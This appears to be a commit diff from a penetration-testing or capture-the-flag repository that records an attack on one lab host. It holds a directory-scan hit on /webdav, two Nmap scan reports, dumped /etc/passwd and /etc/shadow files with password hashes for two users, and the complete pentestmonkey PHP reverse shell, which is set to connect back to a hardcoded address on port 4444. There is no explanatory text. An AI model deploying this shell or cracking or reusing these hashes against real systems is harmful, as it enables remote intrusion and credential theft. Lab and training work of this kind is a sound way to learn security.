2026-06-05
This commit is contained in:
@@ -0,0 +1 @@
|
||||
webdav [33m (Status: 401)[0m [Size: 460]
|
||||
@@ -0,0 +1 @@
|
||||
10.82.161.192
|
||||
@@ -0,0 +1,33 @@
|
||||
# Nmap 7.99 scan initiated Fri May 8 10:06:01 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_01.txt 10.82.161.192
|
||||
Nmap scan report for 10.82.161.192
|
||||
Host is up (0.049s latency).
|
||||
Not shown: 65534 closed tcp ports (reset)
|
||||
PORT STATE SERVICE VERSION
|
||||
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||||
|_http-title: Apache2 Ubuntu Default Page: It works
|
||||
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||||
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||
TCP/IP fingerprint:
|
||||
OS:SCAN(V=7.99%E=4%D=5/8%OT=80%CT=1%CU=35316%PV=Y%DS=3%DC=T%G=Y%TM=69FD99F6
|
||||
OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%TS=8)SEQ(SP=1
|
||||
OS:04%GCD=1%ISR=10D%TI=Z%CI=I%TS=A)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)
|
||||
OS:SEQ(SP=108%GCD=1%ISR=10C%TI=Z%CI=RD%TS=8)SEQ(SP=FD%GCD=1%ISR=102%TI=Z%CI
|
||||
OS:=RD%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8NNT11NW7%O4=M4E8ST11NW
|
||||
OS:7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF
|
||||
OS:%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%
|
||||
OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
|
||||
OS:RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W
|
||||
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
|
||||
OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
|
||||
OS:FI=N%T=40%CD=S)
|
||||
|
||||
Network Distance: 3 hops
|
||||
|
||||
TRACEROUTE (using port 143/tcp)
|
||||
HOP RTT ADDRESS
|
||||
1 51.06 ms 192.168.128.1
|
||||
2 ...
|
||||
3 55.30 ms 10.82.161.192
|
||||
|
||||
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
# Nmap done at Fri May 8 10:08:22 2026 -- 1 IP address (1 host up) scanned in 141.03 seconds
|
||||
@@ -0,0 +1,22 @@
|
||||
# Nmap 7.99 scan initiated Fri May 8 10:09:35 2026 as: /usr/lib/nmap/nmap --privileged -sV --script http-headers -oN nmap_scan_02.txt 10.82.161.192
|
||||
Nmap scan report for 10.82.161.192
|
||||
Host is up (0.091s latency).
|
||||
Not shown: 999 closed tcp ports (reset)
|
||||
PORT STATE SERVICE VERSION
|
||||
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||||
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||||
| http-headers:
|
||||
| Date: Fri, 08 May 2026 08:09:44 GMT
|
||||
| Server: Apache/2.4.18 (Ubuntu)
|
||||
| Last-Modified: Mon, 26 Aug 2019 03:38:48 GMT
|
||||
| ETag: "2c39-590fce4d4ea8c"
|
||||
| Accept-Ranges: bytes
|
||||
| Content-Length: 11321
|
||||
| Vary: Accept-Encoding
|
||||
| Connection: close
|
||||
| Content-Type: text/html
|
||||
|
|
||||
|_ (Request type: HEAD)
|
||||
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
# Nmap done at Fri May 8 10:09:44 2026 -- 1 IP address (1 host up) scanned in 9.19 seconds
|
||||
@@ -0,0 +1,30 @@
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
|
||||
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
|
||||
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
|
||||
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
|
||||
syslog:x:104:108::/home/syslog:/bin/false
|
||||
_apt:x:105:65534::/nonexistent:/bin/false
|
||||
messagebus:x:106:110::/var/run/dbus:/bin/false
|
||||
uuidd:x:107:111::/run/uuidd:/bin/false
|
||||
merlin:x:1000:1000:dav,,,:/home/merlin:/bin/bash
|
||||
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
|
||||
wampp:x:1001:1001:webdav,,,:/home/wampp:/bin/bash
|
||||
|
||||
Executable
+192
@@ -0,0 +1,192 @@
|
||||
<?php
|
||||
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. The author accepts no liability
|
||||
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||
// do not use this tool.
|
||||
//
|
||||
// In all other respects the GPL version 2 applies:
|
||||
//
|
||||
// This program is free software; you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License version 2 as
|
||||
// published by the Free Software Foundation.
|
||||
//
|
||||
// This program is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
//
|
||||
// You should have received a copy of the GNU General Public License along
|
||||
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. If these terms are not acceptable to
|
||||
// you, then do not use this tool.
|
||||
//
|
||||
// You are encouraged to send comments, improvements or suggestions to
|
||||
// me at pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// Description
|
||||
// -----------
|
||||
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||
// The recipient will be given a shell running as the current user (apache normally).
|
||||
//
|
||||
// Limitations
|
||||
// -----------
|
||||
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||
//
|
||||
// Usage
|
||||
// -----
|
||||
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||
|
||||
set_time_limit (0);
|
||||
$VERSION = "1.0";
|
||||
$ip = '192.168.138.181'; // CHANGE THIS
|
||||
$port = 4444; // CHANGE THIS
|
||||
$chunk_size = 1400;
|
||||
$write_a = null;
|
||||
$error_a = null;
|
||||
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||
$daemon = 0;
|
||||
$debug = 0;
|
||||
|
||||
//
|
||||
// Daemonise ourself if possible to avoid zombies later
|
||||
//
|
||||
|
||||
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||
// our php process and avoid zombies. Worth a try...
|
||||
if (function_exists('pcntl_fork')) {
|
||||
// Fork and have the parent process exit
|
||||
$pid = pcntl_fork();
|
||||
|
||||
if ($pid == -1) {
|
||||
printit("ERROR: Can't fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ($pid) {
|
||||
exit(0); // Parent exits
|
||||
}
|
||||
|
||||
// Make the current process a session leader
|
||||
// Will only succeed if we forked
|
||||
if (posix_setsid() == -1) {
|
||||
printit("Error: Can't setsid()");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
$daemon = 1;
|
||||
} else {
|
||||
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||
}
|
||||
|
||||
// Change to a safe directory
|
||||
chdir("/");
|
||||
|
||||
// Remove any umask we inherited
|
||||
umask(0);
|
||||
|
||||
//
|
||||
// Do the reverse shell...
|
||||
//
|
||||
|
||||
// Open reverse connection
|
||||
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||
if (!$sock) {
|
||||
printit("$errstr ($errno)");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Spawn shell process
|
||||
$descriptorspec = array(
|
||||
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||
);
|
||||
|
||||
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||
|
||||
if (!is_resource($process)) {
|
||||
printit("ERROR: Can't spawn shell");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Set everything to non-blocking
|
||||
// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||
stream_set_blocking($pipes[0], 0);
|
||||
stream_set_blocking($pipes[1], 0);
|
||||
stream_set_blocking($pipes[2], 0);
|
||||
stream_set_blocking($sock, 0);
|
||||
|
||||
printit("Successfully opened reverse shell to $ip:$port");
|
||||
|
||||
while (1) {
|
||||
// Check for end of TCP connection
|
||||
if (feof($sock)) {
|
||||
printit("ERROR: Shell connection terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Check for end of STDOUT
|
||||
if (feof($pipes[1])) {
|
||||
printit("ERROR: Shell process terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Wait until a command is end down $sock, or some
|
||||
// command output is available on STDOUT or STDERR
|
||||
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||
|
||||
// If we can read from the TCP socket, send
|
||||
// data to process's STDIN
|
||||
if (in_array($sock, $read_a)) {
|
||||
if ($debug) printit("SOCK READ");
|
||||
$input = fread($sock, $chunk_size);
|
||||
if ($debug) printit("SOCK: $input");
|
||||
fwrite($pipes[0], $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDOUT
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[1], $read_a)) {
|
||||
if ($debug) printit("STDOUT READ");
|
||||
$input = fread($pipes[1], $chunk_size);
|
||||
if ($debug) printit("STDOUT: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDERR
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[2], $read_a)) {
|
||||
if ($debug) printit("STDERR READ");
|
||||
$input = fread($pipes[2], $chunk_size);
|
||||
if ($debug) printit("STDERR: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
}
|
||||
|
||||
fclose($sock);
|
||||
fclose($pipes[0]);
|
||||
fclose($pipes[1]);
|
||||
fclose($pipes[2]);
|
||||
proc_close($process);
|
||||
|
||||
// Like print, but does nothing if we've daemonised ourself
|
||||
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||
function printit ($string) {
|
||||
if (!$daemon) {
|
||||
print "$string\n";
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
|
||||
|
||||
@@ -0,0 +1,30 @@
|
||||
root:!:18134:0:99999:7:::
|
||||
daemon:*:17953:0:99999:7:::
|
||||
bin:*:17953:0:99999:7:::
|
||||
sys:*:17953:0:99999:7:::
|
||||
sync:*:17953:0:99999:7:::
|
||||
games:*:17953:0:99999:7:::
|
||||
man:*:17953:0:99999:7:::
|
||||
lp:*:17953:0:99999:7:::
|
||||
mail:*:17953:0:99999:7:::
|
||||
news:*:17953:0:99999:7:::
|
||||
uucp:*:17953:0:99999:7:::
|
||||
proxy:*:17953:0:99999:7:::
|
||||
www-data:*:17953:0:99999:7:::
|
||||
backup:*:17953:0:99999:7:::
|
||||
list:*:17953:0:99999:7:::
|
||||
irc:*:17953:0:99999:7:::
|
||||
gnats:*:17953:0:99999:7:::
|
||||
nobody:*:17953:0:99999:7:::
|
||||
systemd-timesync:*:17953:0:99999:7:::
|
||||
systemd-network:*:17953:0:99999:7:::
|
||||
systemd-resolve:*:17953:0:99999:7:::
|
||||
systemd-bus-proxy:*:17953:0:99999:7:::
|
||||
syslog:*:17953:0:99999:7:::
|
||||
_apt:*:17953:0:99999:7:::
|
||||
messagebus:*:18134:0:99999:7:::
|
||||
uuidd:*:18134:0:99999:7:::
|
||||
merlin:$1$EWeeql.h$8mH.7rEhPRGsOb5ECtmIe1:18134:0:99999:7:::
|
||||
sshd:*:18134:0:99999:7:::
|
||||
wampp:$6$f8LMirW0$43znQ5kMsELDO9BdUmhbGkUEnVH2OKXZjfEtsyUgbvL79KoJtgLkdbJpHw4OuDDIMtaXjGjkjaRKDv1FFxKsr/:18134:0:99999:7:::
|
||||
|
||||
@@ -0,0 +1 @@
|
||||
wampp:
|
||||
Reference in New Issue
Block a user